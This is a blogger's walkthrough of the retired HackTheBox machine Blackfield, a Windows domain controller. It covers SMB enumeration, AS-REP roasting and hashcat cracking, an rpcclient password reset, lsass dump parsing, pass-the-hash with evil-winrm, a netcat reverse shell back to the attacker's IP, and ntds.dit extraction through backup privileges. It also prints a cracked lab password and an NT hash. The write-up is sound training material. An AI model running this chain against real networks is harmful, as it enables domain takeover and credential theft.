HacktheBox - Blackfield - Retired

HackTheBox - Blackfield - Retired

Recon

I've been using threader3000 to do my initial scan lately. It's a threaded python scanner that scans all tcp ports and then suggests a nmap scan based on live ports. 

/home/circusmonkey404/.local/bin/threader3000

Threader3000 also drops the output to xml which I then convert to HTML using xsltproc

xsltproc blackfield.htb.xml -o blackfield.htm

So we have ports

53 DNS

88 Kerberos

135 RPC

389 LDAP

445

593 RPC

3268 LDAP

So just starting out here it looks like this is definitely a windows box, and possible a Domain Controller. The fact that LDAP, Kerberos and DNS are present is usually an indicator of a domain controller.

We also get a little more info from the nmap scan that doesn't show up in the xml HTML

Looks like the domain is blackfield.local and the name of this machine is DC01

Well there is no web server here. So what to look at first?

How about smb, let's see if there are any open smb shares with anonymous access

To list out shares will try using smbclient

The -L switch will list any shares we might beagle to connect to

Smbclient -L \\\\blackfield.htb   <- with linux we have to double up any slashes so \\blackfield.htb becomes \\\\blackfield.htb

We will get prompted for a password but will just hit enter to use no authentication.

We'll there are a lot of shares we might have access to so we will try to connect to them now to see if we can really get in them or if they need authentication.

We'll use smbclient again to connect 

The syntax would be

Smbclient -U "" \\\\blackfield.htb\\sharename

Here are the results of me trying several shares.

Looks like we can anonymously connect to some but aren't allowed to get the files by using dir.

Let's try a little recon on the DNS service.

dig @10.10.10.192 -t NS blackfield.local

Like we saw earlier dc01.blackfield.local

Let's check if it's the global catalog

dig @10.10.10.192 _gc.blackfield.local

Yup it is.

I tried enum4linux here to see if we could anonymously get some info out of the domain controller and it didn't return any results.

I can connect using rpcclient

rpcclient -U "" -N 10.10.10.192

But get access denied when trying to manually enumerate 

I eventually circled back around to smb.  I found that when connected to profiles we could run dir

Smbclient -U "" \\\blackfield.htb\profiles$

We get a metric crapton of usernames

I copied the usernames out to a file on my kali box called users.txt

Exploit

Now that we have this list we can see if any of them are open for ASREPROASTING

https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/

So by default when a user authenticates to a domain there is a step called preauthentication which they are challenged for their password. This is the default when setting up a new account in AD, its purpose is to protect against brute forcing a user's password. But you can opt out of preauthentication by checking one simple checkbox on the users account in AD.

To see if any of these users have preauthentication turned off we will use an impacket tool called GetNPUsers.py

The basic syntax is this

Python3 GetNPUsers.py domainame/ - usersfile *list of users* -format *how you want the output formatted you can choose hashcat or john* -outputfile *where you want the file written to.

So for our example here we know the domain is blackfield.local. So first lets add that to our /etc/hosts file 

Sudo mousepad /etc/hosts.

Then add 10.10.10.192 blackfield.local 

And save the file

Now for our command it will end up looking like this.

python3 GetNPUsers.py blackfield.local/ -usersfile /home/circusmonkey404/Desktop/HTB/blackfield/Users.txt -format hashcat -outputfile /home/circusmonkey404/Desktop/HTB/blackfield/hashes.asreproast

Then we let the tool eat.

Here in the output you can see a lot of failures… Session errors. 

It can be a little confusing the first time you run this tool because it doesn't just highlight that it worked on "x" account but if you check the output file. You can see we were able to get a ticket

.

So since we formatted this to hashcat, now we need to feed this to hashcat to get the password back.

So we need to figure out the mode to set haschcat to

If we do 

Hashcat --help we can get a list of the modes

Looks like we need 18200 for an AS-REP

So our command will end up looking like this

hashcat -m 18200 -a 0 /home/circusmonkey404/Desktop/HTB/blackfield/hashes.asreproast /usr/share/wordlists/rockyou.txt --force --outfile /home/circusmonkey404/Desktop/HTB/blackfield/cracked.txt

We give it the mode -m 18200

The type of attack   -a 0  ( straight attack)

The location of our saved hashes  /home/circusmonkey404/Desktop/HTB/blackfield/hahses.asrepraost

The location of the wordlist to use

/usr/share/wordlists/rockyou.txt

-- force ( this is because my kali is VM and it yells about resources)

--outfile where we want it to output the cracked password to

/home/circusmonkey404/Desktop/HTB/blackfield/cracked.txt

Hashcat says it was able to get the password for us, so let's check our output file.

Cat /home/circusmonkey404/Desktop/HTB/blackfield/cracked.txt

Looks like the password is #00^BlackKnight

Let's try to connect up to the smb with that password and see if it works

smbclient -L //blackfield.local -U blackfield\\support

Let's see if we can get more access to any of these shares now that we are an authenticated user.

smbclient -L //blackfield.local -U blackfield\\support

Cool lets try some of the shares now.

Looks like we can still get into profiles but not the admin shares and still can't DIR on any of them except profiles……

Well let's try enum4linux - sometimes admins are lazy and put the passwords for services accounts in the description field of AD. I know when I was starting out this was common at a place I worked.

enum4linux -u blackfield\\support -p '#00^BlackKnight' -U blackfield.local

No such luck here.

So now that we are authenticated we can dump out the entirety of the ldap to see if we can learn anything from it.

ldapsearch -D 'blackfield\support' -w '#00^BlackKnight' -x -b "dc=blackfield,dc=local" "*" -h 10.10.10.192  > /home/circusmonkey404/Desktop/HTB/blackfield/ldap.txt

This dumps all of the ldap info and puts in a file called ldap.txt

We can now grep against that to look for info, I like to see who is in the IT department

grep "IT" -B 7 -A 15 ./ldap.txt  > ITDEpt.txt

This will grep for IT and select the previous 7 lines before IT and the 15 lines after stick it in a file name ITDept.txt

So some of the interesting things we can look at here is the last logon and logoff

For example here the administrator account is the only one who has IT set as their department who has ever logged into the domain.

Using a similar search I grep'd for LogonCount: and looked for accounts that had actually be logged into

grep "logonCount: "[1-99] -B 7 -A 15 ./ldap.txt

Administrator Guest svc_backup

These were the only accounts that have ever actually been logged into, this might not be helpful in a real pentest but here on hackthebox, we can assume these means that these accounts are going to be important

Especially

Administrator

Svc_backup

I grepped for svc_backup

And found they are members of Backup Operators and Remote Management Users

Googling around for escalation techniques using RPC client. I found this https://malicious.link/post/2017/reset-ad-user-password-with-linux/

If the user is privileged to reset passwords in a domain then they can do this via rpclient also.

The account we have access to know is called support. I would assume a big part of the support role in an IT department is resetting users passwords.

I find some users to test on. I find it interesting the UPN's for the users in this ad environment are almost exclusively

BLACKFIELD**RADNOMNUMBERS*****@BLACKFIELD.local

I picked on a person in the IT department to try first, since they are usually more privileged than other users.

When I tired 

setuserinfo2 BLACKFIELD496547 24 'Winter2020!'

I got an access denied, I got this for all the the AD users I tried with UPNs of Blackfield*somenumber*@blackfield.local

I double checked the password requirements incase this password didn't meet requirements

Minimum length 7 and complexity is on.. My test password should work. Maybe this support just has access to reset passwords on specific accounts or OUs…. what about the users that have different UPNS

I used grep to filter out all account that that started with blackfield

I'm sure there is a more elegant way to do this but it worked. :)

grep "sAMAccountName" ./ldap.txt | grep -v "sAMAccountName: BLACKFIELD"

I broke this list down further to be real user accounts and not builtin AD accounts and got these out. I did this just using my knowledge of Active Directory and what the builtin account names are.

This is the result of pruning some more.

sAMAccountName: audit2020 sAMAccountName: support sAMAccountName: svc_backup sAMAccountName: lydericlefebvre

We already have the password for support.

So that really leaves

sAMAccountName: audit2020 sAMAccountName: svc_backup sAMAccountName: lydericlefebvre

Let's start with the first one, There was a smb share called forensics I imagine they would have access to.

Let's see if we can reset audit2020's password.

setuserinfo2 audit2020 24 'Winter2020!'

No error, let's try to connect up to that smb again as this user.

We were able to connect up to forensic share.

Let's poke around.

Well we found some outputs of commands from what looks like a pentest done against the company in the commands_output folder.

But under the memory_analysis folder we find what looks like a dump of the lsass process. Named lsass.zip.

I tried transferring this via smbclient but it would eventually timeout

So I mounted it in kali directly to xfer it to my box.

If you are unfamiliar with lsass…… well you should get to know it. 

From Wikipedia

"Local Security Authority Subsystem Service is a process in Microsoft Windows operating systems that is responsible for enforcing the security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens"

But for our purpose here it basically holds the plaintext passwords for the machine.  We just need to dump the process using a program like procdump. Then we can load it up in mimikatz to get our plaintext passwords out.

Here is a blog post showing the steps needed to get to these passwords.

https://medium.com/@ali.bawazeeer/using-mimikatz-to-get-cleartext-password-from-offline-memory-dump-76ed09fd3330

Well I've run mimkatz plenty of times on windows machines… but never on kali.

I found pypykatz is a sort of port of mimikatz. So Let's try it out.

I found this blog which gave me the syntax

https://en.hackndo.com/remote-lsass-dump-passwords/

pypykatz lsa minidump /home/circusmonkey404/Desktop/HTB/blackfield/lsass.DMP

Ok let's see what we get…

We see that svc_backup account

We can see hashes but not the actual password…

Same thing for the Administrator account.

So we got a hash but now password. I think this is ok. We can try to just pass the hash to get in.

Since WinRM is available to use, we can try to pass the hash with it.

Of course I tried the Administrator account first, but no dice. Maybe they changed the Administrator password since that lsass dump was made

But we had better luck with svc_backup

And from here we can get to the user.txt in C:\Users\svc_backup\Desktop

Now we need to figure out a path to root.

https://roberthosborne.com/privesc

I found this blog that talks about using our backup privileges to export out a copy of ntds.dit

The basic Idea is since the svc_backup is part of backup operators and has the SeBackupPrivliege. We can leverage this to make a backup of the ntds.dit file for the domain, if we can get that and also dump out some of the registry we can get some other hashes or passwords to use to get into the administrator account.

SO we need to start by making a shadow copy of the C: drive using diskshadow so we can have access to the normally protected ntds.dit file.

So it took me a while to get this going and I just want to point this out, for some reason diskshadow needs another character at the end of each of these commands in order for them to properly execute. Also I couldn't get powershell to enter diskshadow so I setup another reverse shell for cmd.exe which could enter diskshadow correctly.

diskshadow set context persistent nowriters add volume c: alias dmwong create expose %dmwong% z:

So to get to cmd.exe

I started a nc listener on my kali box

Nc -lnvp 5555

Then from blackfield I used the same NC64.exe I used earlier to get my shell

C:\temp\circusmonkey\NC64.exe 10.10.14.6 5555 - e cmd.exe

Now we just enter our diskshadow commands with a ; at the end for some reason :)

DiskShadow Set context persistent nowriters; Add volume C: alias circusmonkey; Create; Expose %circusmonkey% Z:;

Now we need to import a couple of powershell modules to access the exposed shadow copy which is now Z:

https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug

We can use the built in upload feature of winrm to do this for us. Since I have the two dlls in the same folder I launched winRM from I just do

upload ./SeBackupPrivilegeUtils.dll upload ./SeBackupPrivilegeCmdLets.dll

Now we need to import those modules into powershell with our evil-winRM connection.

Import-Module .\SeBackupPrivilegeUtils.dll Import-Module .\SeBackupPrivilegeCmdLets.dll

Now we will check to see if they imported correctly

get-help SeBackupPrivilege

Now we just need to copy out the ntds.dit file from our backup exposed.

Copy-FileSeBackupPrivilege z:\windows\NTDS\ntds.dit c:\temp\circusmonkey\ntds.dit -Overwrite

Now we need the system registry hive 

reg.exe save HKLM\SYSTEM C:\temp\circusmonkey\system.hive

download system.hive download ntds.dit

Now we can use impacket's secret dump to get the hashes out of these files

python3 /tools/impacket/examples/secretsdump.py -ntds ntds.dit -system system.hive LOCAL

Now lets try and pass this hash in evil-winrm

evil-winrm -i 10.10.10.192 -u Administrator -H 184fb5e5178480be64824d4cd53b99ee

Type ../Desktop/root.txt

Well that is not what I wanted to see.

Access denied reading root.txt

But there is this note.

Mates, After the domain compromise and computer forensic last week, auditors advised us to: - change every passwords -- Done. - change krbtgt password twice -- Done. - disable auditor's account (audit2020) -- KO. - use nominative domain admin accounts instead of this one -- KO. We will probably have to backup & restore things later. - Mike. PS: Because the audit report is sensitive, I have encrypted it on the desktop (root.txt)

In the Documents folder there is this PS1 script called watcher.ps1

sleep 30 $file = "C:\Users\Administrator\Desktop\root.txt" $command = "(Get-Item -Path $file).Encrypt()"

So We can guess this is running on a schedule to re-encrypt this file every 30 seconds.

But since we know the way they are encrypting we can just reverse this to decrypt the file

$file = "C:\Users\Administrator\Desktop\root.txt" $command = "(Get-Item -Path $file).Decrypt()" $command

*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt 4375a*************************